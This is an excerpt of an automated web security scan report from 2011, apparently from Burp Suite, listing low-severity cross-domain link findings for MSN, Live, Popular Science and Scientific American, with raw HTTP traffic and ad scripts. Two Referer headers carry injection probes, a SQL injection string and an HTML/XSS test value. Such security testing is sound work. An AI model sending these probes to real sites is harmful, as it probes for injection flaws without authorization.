<li class="" title="money"><a href="http://money.msn.com/investing" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://money.msn.com/personal-finance" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://investing.money.redacted/investments/stock-price" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.redacted/" title="Real Estate &amp; Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://money.msn.com/money-video" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.redacted/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.redacted/your-look/" title="Beauty &amp; Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.redacted/your-home/" title="Decor &amp; Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.redacted/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.redacted/relationships/" title="Love &amp; Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps &amp; Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers &amp; Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.redacted/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections &amp; Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://investing.money.redacted/investments/stock-price" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.redacted/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.redacted/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.redacted/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.redacted" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link" title="Bing">Bing</a>
...[SNIP]...
<h3><a href="http://www.ticketexchangebyticketmaster.com/NFL/default.aspx" title="NFL Tickets" target="_blank">NFL Tickets</a>
...[SNIP]...
<h3><a href="http://www.ticketsnow.com/mlb-tickets/" title="MLB Tickets" target="_blank">MLB Tickets</a>
...[SNIP]...
<h3><a href="http://www.ticketsnow.com/nba-tickets/" title="NBA Tickets" target="_blank">NBA Tickets</a>
...[SNIP]...
<h3><a href="http://www.ticketsnow.com/nhl-tickets/" title="NHL Tickets" target="_blank">NHL Tickets</a>
...[SNIP]...
<h3><a href="http://www.ticketsnow.com/college-football-tickets/" title="NCAA FB Tickets" target="_blank">NCAA FB Tickets</a>
...[SNIP]...
<h3><a title="Tickets" href="http://www.ticketsnow.com/" target="_blank">Tickets</a>
...[SNIP]...
<h3><a title="FOX News" href="http://www.foxnews.com">FOX News</a>
...[SNIP]...
<h3><a title="News Corp." href="http://www.newscorp.com">News Corp.</a>
...[SNIP]...
<h3><a title="FOX" href="http://www.fox.com">FOX</a>
...[SNIP]...
<h3><a title="FOX Sports Supports" href="http://www.foxsportssupports.com">FOX Sports Supports</a>
...[SNIP]...
<h3><a title="FX" href="http://www.fxnetworks.com">FX</a>
...[SNIP]...
<h3><a title="Speed TV" href="http://www.speedtv.com">Speed TV</a>
...[SNIP]...
<h3><a title="NCAAFuel TV" href="http://www.fuel.tv">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<!-- Begin comScore Tag -->
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.redacted/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.redacted/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.redacted/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...

22.242. http://my.live.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.live.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /?add= HTTP/1.1
Host: my.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:16:59 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S:WEBA02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://my.redacted
Set-Cookie: mktstate=S=306174342&U=&E=&P=&B=en; domain=live.com; path=/
Set-Cookie: mkt1=norm=en-us; domain=live.com; path=/
Set-Cookie: mkt2=ui=en-us; domain=my.live.com; path=/
Set-Cookie: lastMarket=en-us; domain=.live.com; path=/
Set-Cookie: lastMktPath=en/us; domain=.live.com; path=/
Set-Cookie: frm=true; domain=.live.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 134

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://my.redacted">here</a>.</h2>
</body></html>

22.243. http://my.redacted/addtomymsn.armx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.redacted
Path:   /addtomymsn.armx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /addtomymsn.armx?id=rss&ut= HTTP/1.1
Host: my.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:17:00 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPMYREN02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353820&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.msn.com%2faddtomymsn.armx%3fid%3drss%26ut%3d&lc=1033&id=254014
Cache-Control: no-cache
ETag: "9d2255aeb787cb1:7c6"
Last-Modified: Fri, 19 Nov 2010 07:02:08 GMT
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 321

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353820&amp;rver=5.5.4177.0&amp;wp=mbi&amp;wreply=http:%2f%2fmy.redacted%2faddtomymsn.armx%3fid%3drss%26ut%3d&amp;lc=1033&amp;id=254014">here</a>
...[SNIP]...

22.244. http://my.redacted/addtomymsn.armx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.redacted
Path:   /addtomymsn.armx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /addtomymsn.armx?id=rss&ut= HTTP/1.1
Host: my.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 18:06:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPMYREN05
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410787&rver=5.5.4177.0&wp=mbi&wreply=http:%2f%2fmy.msn.com%2faddtomymsn.armx%3fid%3drss%26ut%3d&lc=1033&id=254014
Cache-Control: no-cache
ETag: "9d2255aeb787cb1:7c6"
Last-Modified: Fri, 19 Nov 2010 07:02:08 GMT
Cache-Control: no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 321

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410787&amp;rver=5.5.4177.0&amp;wp=mbi&amp;wreply=http:%2f%2fmy.redacted%2faddtomymsn.armx%3fid%3drss%26ut%3d&amp;lc=1033&amp;id=254014">here</a>
...[SNIP]...

22.245. http://oasc03049.popsci.com/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc03049.popsci.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05? HTTP/1.1
Host: oasc03049.popsci.com
Proxy-Connection: keep-alive
Referer: http://www.popsci.com/?172683569'%20or%201%3d1--%20=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS98684d1eb89eae890ac2d30814f7062d=v2tc6q1pdr66s599a60pjsel52

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:16:01 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW801FnNEABrjk; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.popsci.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 13662
Content-Type: application/x-javascript
Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3926.137929.POPULARSCIENCE.COM/B5150996.2;sz=728x90;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/973660255/Bottom/WorldPub/PSC_CSX_Home_Geo_728x90_Jan11/PSC_CSX_Home_Geo_728x90_Jan11.html/72634857383031466e4e454142726a6b?;ord=973660255?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
x90_Jan11/PSC_CSX_Home_Geo_728x90_Jan11.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N3926.137929.POPULARSCIENCE.COM/B5150996.2;sz=728x90;ord=973660255?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3926.137929.POPULARSCIENCE.COM/B5150996.2;sz=728x90;ord=973660255?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...
00x250_Jan11/PSC_Digikey_BOWN_300x250.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N4481.137929.POPULARSCIENCE.COM/B4562968.4;sz=300x250;ord=1120588389?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N4481.137929.POPULARSCIENCE.COM/B4562968.4;sz=300x250;ord=1120588389?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Click Here"></A>
...[SNIP]...
8389/BottomRight/WorldPub/PSC_Digikey_BOWN_300x250_Jan11/PSC_Digikey_BOWN_300x250.html/72634857383031466e4e454142726a6b?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>');
}
if (position == 'Frame1') {
document.write ('<iframe src="http://view.atdmt.com/K01/iview/271569794/direct/01/2117503039?click=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/2117503039/Frame1/WorldPub/PSC_PBS_NOVA_ROS_300x100_CO/PSC_PBS_NOVA_ROS_300x100_CO.html/72634857383031466e4e454142726a6b?" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="100">\n');
document.write ('<script language="JavaScript" type="text/javascript">
...[SNIP]...
L24/2117503039/Frame1/WorldPub/PSC_PBS_NOVA_ROS_300x100_CO/PSC_PBS_NOVA_ROS_300x100_CO.html/72634857383031466e4e454142726a6b?http://clk.redcated/K01/go/271569794/direct/01/2117503039" target="_blank"><img border="0" src="http://view.atdmt.com/K01/view/271569794/direct/01/2117503039" /></a>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/1329198827/Position1/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>');
}
if (position == 'Right1') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.15;sz=300x250;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/16016899/Right1/WorldPub/PSC_AutoZone_Home_300x250/PSC_AutoZone_Home_300x250.html/72634857383031466e4e454142726a6b?;ord=16016899?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
AutoZone_Home_300x250/PSC_AutoZone_Home_300x250.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N2465.SD137929N2465SN0/B4809700.15;sz=300x250;ord=16016899?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N2465.SD137929N2465SN0/B4809700.15;sz=300x250;ord=16016899?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Click Here"></A>
...[SNIP]...
P_300x250_Jan11/PSC_Digikey_HP_300x250.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N4481.137929.POPULARSCIENCE.COM/B4562968.2;sz=300x250;ord=395977082?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N4481.137929.POPULARSCIENCE.COM/B4562968.2;sz=300x250;ord=395977082?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Click Here"></A>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/637465660/Right3/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
ey_HP_728x90_Jan11/PSC_Digikey_HP_728x90.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N4481.137929.POPULARSCIENCE.COM/B4562968;sz=728x90;ord=2054956119?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N4481.137929.POPULARSCIENCE.COM/B4562968;sz=728x90;ord=2054956119?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Click Here"></A>
...[SNIP]...
/oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L14/1108816809/Top1/WorldPub/PSC_HouseCirc_ROS_205x94/psc_205x90_house.gif/72634857383031466e4e454142726a6b?x" target="_blank"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/WorldPub/PSC_HouseCirc_ROS_205x94/psc_205x90_house.gif/1277498109" ALT="" BORDER="0"></A>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/338548948/x01/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
</div>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.8;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/283638657/x02/WorldPub/PSC_AutoZone_CarsNav_88x31/PSC_AutoZone_CarsNav_88x31.html/72634857383031466e4e454142726a6b?;ord=283638657?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
AutoZone_CarsNav_88x31/PSC_AutoZone_CarsNav_88x31.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N2465.SD137929N2465SN0/B4809700.8;sz=88x31;ord=283638657?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N2465.SD137929N2465SN0/B4809700.8;sz=88x31;ord=283638657?" BORDER=0 WIDTH=88 HEIGHT=31 ALT="Click Here"></A>
...[SNIP]...
Nav_88x31_Jan11/PSC_Digikey_DrpNav_88x31.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N4481.137929.POPULARSCIENCE.COM/B4562968.8;sz=88x31;ord=905700210?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N4481.137929.POPULARSCIENCE.COM/B4562968.8;sz=88x31;ord=905700210?" BORDER=0 WIDTH=88 HEIGHT=31 ALT="Click Here"></A>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/74080502/x04/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
</div>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N2465.SD137929N2465SN0/B4809700.27;sz=88x31;click0=http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/L24/866922241/x05/WorldPub/PSC_AutoZone_DIYNav_88x31/PSC_AutoZone_DIYNav_88x31.html/72634857383031466e4e454142726a6b?;ord=866922241?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
_AutoZone_DIYNav_88x31/PSC_AutoZone_DIYNav_88x31.html/72634857383031466e4e454142726a6b?http://ad.doubleclick.net/jump/N2465.SD137929N2465SN0/B4809700.27;sz=88x31;ord=866922241?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N2465.SD137929N2465SN0/B4809700.27;sz=88x31;ord=866922241?" BORDER=0 WIDTH=88 HEIGHT=31 ALT="Click Here"></A>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/1774885978/x89/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/1593650714/x90/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
<A HREF="http://oasc03049.popsci.com/RealMedia/ads/click_lx.ads/www.popsci.com/index.jsp/1948896634/x96/default/empty.gif/72634857383031466e4e454142726a6b?x" target="_top"><IMG SRC="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...

22.246. http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.scientificamerican.com
Path:   /RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41?observations&&&referrer=http://burp/show/60 HTTP/1.1
Host: oascentral.scientificamerican.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:14:45 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW801FnIUACoU2; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.scientificamerican.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 7042
Content-Type: application/x-javascript
Set-Cookie: NSC_d14efm_qppm_iuuq=ffffffff09499e5945525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2005419&PluID=0&w=300&h=250&ncu=$$http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1242882707/Right1/sciam.com/p_2011-01_Corning_Home_sync/p_2010-12_Corning_Home_sync_300x250.html/72634857383031466e495541436f5532?http://$$&ord=1242882707"></script>
...[SNIP]...
g_Home_sync/p_2010-12_Corning_Home_sync_300x250.html/72634857383031466e495541436f5532?http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp?FlightID=2005419&Page=&PluID=0&Pos=6562" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/BannerSource.asp?FlightID=2005419&Page=&PluID=0&Pos=6562" border=0 width=300 height=250></a>
...[SNIP]...
</noscript>\n');
}
if (position == 'Right2') {
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad-apac.doubleclick.net/adj/N3880.182985.SCIENTIFICAMERICAN./B4872648.33;dcove=o;sz=300x250;click0=http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1016552314/Right2/sciam.com/p_2010-12_Volt_CoBrand_ros/p_2010-12_Volt_Cobrand_ros_300x250.html/72634857383031466e495541436f5532?;ord=1016552314?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
lt_Cobrand_ros_300x250.html/72634857383031466e495541436f5532?http://ad-apac.doubleclick.net/jump/N3880.182985.SCIENTIFICAMERICAN./B4872648.33;dcove=o;sz=300x250;ord=1016552314?">\n');
document.write ('<IMG SRC="http://ad-apac.doubleclick.net/ad/N3880.182985.SCIENTIFICAMERICAN./B4872648.33;dcove=o;sz=300x250;ord=1016552314?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Click Here"></A>
...[SNIP]...
</NOSCRIPT>\n');
}
if (position == 'Top') {
document.write ('<script src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2009818&PluID=0&w=728&h=90&ncu=$$http://oascentral.scientificamerican.com/RealMedia/ads/click_lx.ads/sciam.com/observations/L22/1095766167/Top/sciam.com/p_2011-01_Corning_Home_sync/p_2010-12_Corning_Home_sync_728x90.html/72634857383031466e495541436f5532?http://$$&ord=1095766167"></script>
...[SNIP]...
ng_Home_sync/p_2010-12_Corning_Home_sync_728x90.html/72634857383031466e495541436f5532?http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp?FlightID=2009818&Page=&PluID=0&Pos=6562" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/BannerSource.asp?FlightID=2009818&Page=&PluID=0&Pos=6562" border=0 width=728 height=90></a>
...[SNIP]...
/ads/click_lx.ads/sciam.com/observations/L9/509007020/x40/sciam.com/i_2010-09_Newsletters/i_2010-09_Newsletters_120x90.html/72634857383031466e495541436f5532" target="_blank">\n');
document.write (' <img src="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/sciam.com/i_2010-09_Newsletters/nwsltrs_120x90.gif/1285109808" style="border:0px black solid;" width="120" height="90" alt="" />\n');
document.write ('</a>
...[SNIP]...
s/click_lx.ads/sciam.com/observations/L9/1369103083/x41/sciam.com/s_2010-09_keep-evolving/s_2010-09_keep-evolving_120x90.html/72634857383031466e495541436f5532" target="_blank">\n');
document.write ('        <img src="http://imagec14.247realmedia.com/RealMedia/ads/Creatives/sciam.com/s_2010-09_keep-evolving/SciAm_KeepEvolving_728x90.jpg/1285108312" width="120" height="90" alt="" style="border:0px black solid;" />\n');
document.write ('    </a>
...[SNIP]...

22.247. http://photoblog.msnbc.redacted/_news/2011/01/28/5942494-double-whammy-on-the-sun

Summary

Severity:   Information
Confidence:   Certain
Host:   http://photoblog.msnbc.redacted
Path:   /_news/2011/01/28/5942494-double-whammy-on-the-sun

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_news/2011/01/28/5942494-double-whammy-on-the-sun?gt1=43001 HTTP/1.1
Host: photoblog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=19
